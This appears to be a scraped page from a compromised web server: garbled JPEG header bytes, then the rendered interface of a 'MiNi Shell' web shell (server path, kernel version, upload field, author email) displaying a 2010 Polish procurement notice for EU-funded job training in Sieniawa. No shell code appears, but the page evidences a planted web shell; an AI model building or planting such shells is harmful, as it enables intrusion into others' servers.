JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100601/153020-N-2010.html

<p class="kh_header"><b>Sieniawa: Organizacja i przeprowadzenie szkoleń dla:

Uczestników projektu pn. Czas na aktywność w gminie Sieniawa     realizowanego przez Miejsko- Gminny Ośrodek Pomocy Społecznej w Sieniawie  współfinansowanego ze środków EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO i realizowanego w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</b><br>
<b>Numer ogłoszenia: 153020 - 2010; data zamieszczenia: 01.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. Rynek 1, 37-530 Sieniawa, woj. podkarpackie, tel. 016 6227301 w. 27, faks 016 6227301.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń dla:

Uczestników projektu pn. Czas na aktywność w gminie Sieniawa     realizowanego przez Miejsko- Gminny Ośrodek Pomocy Społecznej w Sieniawie  współfinansowanego ze środków EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO i realizowanego w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Organizacja i przeprowadzenie szkoleń dla: uczestników projektu 
pn. Czas na aktywność w gminie Sieniawa realizowanego przez Miejsko- Gminny Ośrodek Pomocy Społecznej w Sieniawie  współfinansowanego ze środków EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO 
i realizowanego w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Podziałanie 7.1.1 Rozwój 
i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.  
Celem głównym projektu jest przeciwdziałanie marginalizacji i wykluczeniu społecznemu uczestników projektu poprzez uruchomienie procesu aktywizacji społecznej, edukacyjnej i zawodowej  podopiecznych Miejsko-Gminnego Ośrodka Pomocy Społecznej w Sieniawie. 
Przedmiot zamówienia obejmuje:

1.1 Terapię psychologiczną 
Miejsce szkolenia; budynek Urzędu Miasta i Gminy Sieniawa. 
Liczba uczestników: 12 osób. 
Zajęcia mają mieć formę indywidualnych spotkań uczestników projektu z psychologiem, podczas których uczestnicy lepiej poznają siebie, swoje słabości oraz mocne strony, jak również nabędą umiejętności prawidłowej komunikacji interpersonalnej i negocjacji z ludźmi. W trakcie terapii ważnym elementem ma być tematyka roli kobiety i mężczyzny w rodzinie.
Ilość godzin: 1 godzina = 60 minut dla każdego uczestnika projektu indywidualnie w miesiącu czerwcu 2010r. i 1 godzina = 60 minut dla każdego uczestnika projektu indywidualnie w miesiącu listopadzie 2010 r.

1.2 Szkolenie z zakresu aktywizacji zawodowej - doradztwo zawodowe
Miejsce szkolenia; budynek Urzędu Miasta i Gminy w Sieniawie. 
Liczba uczestników: 12 osób.
Ilość godzin: 1 godzina = 60 minut dla każdego uczestnika projektu indywidualnie w miesiącu czerwcu 2010 r. ponadto 2 spotkania dla 12 osób w wymiarze 4 godzin dziennie (1 godzina = 60 minut). 
Szkolenie ma mieć formę warsztatów pn. Aktywne poszukiwanie pracy, które mają obejmować tematykę z zakresu:
- przełamywania istniejącego stereotypu podziału na zawody typowo męskie i typowo kobiece,
- przygotowania do rozmowy kwalifikacyjnej,
- techniki szukania pracy,
- rynek pracy w powiecie, Polsce i na świecie, zawody przyszłości.
Termin realizacji: czerwiec 2010r.

1.3 Przeprowadzenie treningów (grupowych) kompetencji społecznych 
Miejsce szkolenia: budynek Urzędu Miasta i Gminy w Sieniawie. 
Liczba uczestników: 12 osób 
Liczba godzin: 16 godzin/grupę(1 godzina = 45 minut). 
Trening ma na celu nabycie umiejętności z zakresu: 
- komunikacji interpersonalnej, 
- asertywności,
- umiejętności społecznych,
- pisania listów CV i listu motywacyjnego.
Termin realizacji: czerwiec 2010r. 

1.4	Kursy zawodowe- program kursów zawodowych niżej wymienionych  ma być zgodny z programem  zamieszczonym na stronie internetowej  www.standardyiszkolenia.praca.gov.pl

a)	opiekunka domowa 
Miejsce szkolenia : Sieniawa, Jarosław, Przeworsk, Przemyśl, Rzeszów.
 Liczba uczestników: 1 osoba
Ilość godzin - 115 (1 godzina = 45 minut) 
Celem szkolenia jest przygotowanie praktyczne i teoretyczne do wykonywania zawodu - opiekunka. 
Termin realizacji: lipiec - sierpień 2010r.   

b)	kucharz
Miejsce szkolenia: Sieniawa, Jarosław, Przeworsk, Przemyśl, Rzeszów.
Liczba uczestników: 3 osoby
Ilość godzin: 110 (1 godzina = 45 minut) 
Celem kursu jest teoretyczne i praktyczne przygotowanie do zawodu - kucharz.
Termin realizacji: lipiec- sierpień 2010r. 

c)	operator  wózków jezdniowych
Miejsce szkolenia : Sieniawa, Jarosław, Przeworsk, Przemyśl, Rzeszów
Liczba uczestników: 2 osoby
Ilość godzin: 55 (1 godzina = 45 minut) 
Celem kursu jest teoretyczne i praktyczne przygotowanie do zawodu - operatora wózków jezdniowych.
Termin realizacji: lipiec - sierpień 2010 r. 

d)	sprzedawca z obsługą kasy fiskalnej
Miejsce szkolenia: Sieniawa, Jarosław, Przeworsk, Przemyśl, Rzeszów.
Liczba uczestników: 2 osoby
Ilość godzin: 120 (1 godzina= 45 minut) 
Celem kursu jest teoretyczne i praktyczne przygotowanie do zawodu - sprzedawca z obsługą kasy fiskalnej. 
Termin realizacji: lipiec - sierpień 2010r.

e)	operator pił mechanicznych do ścinki drzew  
Miejsce szkolenia: Jarosław, Przeworsk, Przemyśl, Rzeszów.
Liczba uczestników: 1 osoba
Ilość godzin: 130 (1 godzina= 45 minut) 
Celem kursu jest nadanie uprawnień operatora pił mechanicznych do ścinki drzew.
Termin realizacji: lipiec - sierpień 2010r. 

f)	murarz z uprawnieniami czeladnika 
Miejsce szkolenia : Jarosław, Przeworsk, Przemyśl, Rzeszów.
Liczba uczestników: 1 osoba
Ilość godzin: 120 (1 godzina= 45 minut) 
Celem kursu jest przyuczenie do zawodu murarza oraz nadanie tytułu zawodowego (czeladnik)
Termin realizacji: lipiec - sierpień 2010r.

g)	spawanie w osłonie argonu 
Miejsce szkolenia: Jarosław, Przeworsk, Przemyśl, Rzeszów.
Liczba uczestników: 2 osoby 
Ilość godzin: 80 (1 godzina= 45 minut)
 Celem kursu jest uzyskanie uprawnień w zawodzie spawacz
Termin realizacji: lipiec - sierpień 2010r. 

h)	podstawy obsługi komputera  
Miejsce kursu: Gmina Sieniawa.
Liczba uczestników: 12 osób
Ilość godzin: 60 (1 godzina = 45 minut) 
Celem kursu jest praktyczne i teoretyczne zapoznanie się z podstawami obsługi komputera.
Program kursu obejmować powinien:
- budowę komputera - budowę wewnętrzna,
- środowisko MS WINDOWS;
- edytor tekstu - MS WORD;
- arkusz kalkulacyjny - MS EXCEL;
Termin realizacji: wrzesień - październik 2010r. 

Szkolenia: pkt 1.1 - 1.4 mają się odbywać od poniedziałku do piątku. Maksymalna ilość godzin - 8 godz. dziennie zapewniając przynajmniej jedna przerwę na posiłek.
Wykonawca ponosi wszelkie koszty związane z realizacją zamówienia z uwzględnieniem obowiązujących w tym zakresie przepisów prawa.
Wykonawca zapewnia:
- salę szkoleniową - w przypadku kursów zawodowych,
- sprzęt dydaktyczny, 
- materiały szkoleniowe dla uczestników, 
- warunki w czasie szkoleń zgodne z przepisami BHP, 
- wyżywienie; śniadanie(kanapki), ciastka, kawa, herbata, ciepły posiłek. 
W sali szkoleniowej należy umieścić informację o współfinansowaniu szkolenia przez Europejski Fundusz Społeczny z logo EFS i realizowanego w ramach Programu Operacyjnego Kapitał Ludzki.
Wykonawca pokrywa koszty niezbędnych badań lekarskich uczestników danego szkolenia (wyrobienie książeczki zdrowia jeżeli specyfika kursu tego wymaga), ubezpieczenia uczestników szkolenia 
od następstw nieszczęśliwych wypadków (w drodze na szkolenia, w trakcie szkolenia oraz w drodze powrotnej ze szkolenia). Szkolenia mają zakończyć się oceną zdobytych umiejętności oraz wydaniem certyfikatu o ukończeniu szkolenia zgodnie z obowiązującymi w tym zakresie przepisami (Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006r. Nr 31, poz. 216). Wydane certyfikaty muszą zawierać logotypy Programu Operacyjnego Kapitał Ludzki oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Wykonawca po wykonaniu zadania przedstawi Zamawiającemu listy obecności uczestników, plany zajęć, kserokopie rejestru wydanych certyfikatów, ankiety badające poziom zadowolenia  i wzrost wiedzy uczestników przeprowadzone na początku i na końcu trwania projektu, opinię na temat każdego uczestnika, raport końcowy obejmujący zarówno całość grupy jak
i poszczególnych uczestników oraz przeprowadzi ankiety porównawcze (ewaluacyjne) przed i po zakończeniu projektu. Zamawiający zastrzega sobie możliwość prowadzenia bieżącego nadzoru nad procesem szkolenia uczestników na każdym jego etapie. W przypadku gdy szkolenie odbywać się będzie poza terenem Miasta i Gminy Sieniawa Wykonawca zobowiązuje się do pokrywania kosztów dojazdu uczestników projektu z miejsca zamieszkania do miejsca szkolenia i powrót do miejsca zamieszkania. Zwrot kosztów będzie dokonywany na podstawie przedłożonych biletów za przejazd środkami komunikacji zbiorowej.
W przypadku przerwania szkolenia przez uczestnika projektu do 25% realizacji zajęć Zamawiający skieruje w jego miejsce następną osobę, a Wykonawca dołoży starań aby osoba dołączona do grupy uzupełniła zakres materiału. W przypadku przekroczenia w/w wartości wskutek przerwania szkolenia przez uczestnika projektu, Zamawiający sfinansuje koszty szkolenia osoby, która przerwała kurs zawodowy za okres uczestnictwa w szkoleniu, na podstawie wyliczeń przekazanych przez Wykonawcę.
Zamawiający zastrzega sobie możliwość kierowania na kursy pojedynczych osób..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena za pomoca warunku granicznego spełnia/nie spełnia na podstwie dostarczonych dokumentów.
posiadają wpis do rejestru instytucji szkoleniowych wydawany przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej (zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236 poz. 2365),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena za pomoca warunku granicznego spełnia/nie spełnia na podstwie dostarczonych dokumentów.
Warunek ten będzie spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował lub realizuje co najmniej dwie usługi szkoleniowe o podobnym przedmiocie zamówienia o wartości 45 000,oo zł brutto 
(słownie: czterdzieści pięć tysięcy złotych 00/100) każda, oraz załączy dokumenty potwierdzające, 
że usługi te zostały wykonane należycie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena za pomoca warunku granicznego spełnia/nie spełnia na podstwie dostarczonych dokumentów.
 Warunek ten będzie spełniony jeżeli Wykonawca przedłoży dokument potwierdzajacy dysponowanie pomieszczeniami wykładowymi, których liczba, wielkość i standard jest adekwatna do    
  wielkości grup szkoleniowych 
Posiadają własny (lub dysponują potwierdzony umową/umowami) sprzęt (np. wózek widłowy, kasy fiskalne, piły mechaniczne do ścinki drzew</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena za pomoca warunku granicznego spełnia/nie spełnia na podstwie dostarczonych dokumentów
Zatrudnia odpowiednio wykwalifikowany personel (załącznik nr 5 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeżeli Wykonawca przedłoży podpisane Oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	dokumenty potwierdzające, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego,
b)	program szkolenia, który ma zawierać:
- nazwę i zakres szkolenia,
- czas trwania i sposób organizacji szkolenia,
- cele szkolenia,
- plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części    teoretycznej i praktycznej,
- certyfikaty jakości usług na kierunki szkolenia na które wykonawca złoży ofertę. 
c) Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu , potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie wykonawcy - 20</li>
<li>3 - Certyfikat jakości - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zetorzeszow.eu/umigsieniawa/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko - Gminny Ośrodek Pomocy Społecznej w Sieniawie 37-530 Sieniawa ul. Rynek 1 pok Nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2010 godzina 10:00, miejsce: Miejsko - Gminny Ośrodek Pomocy Społecznej w Sieniawie 37-530 Sieniawa ul. Rynek 1 pok.  Nr 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> współfinansowanego ze środków EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO i realizowanego w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com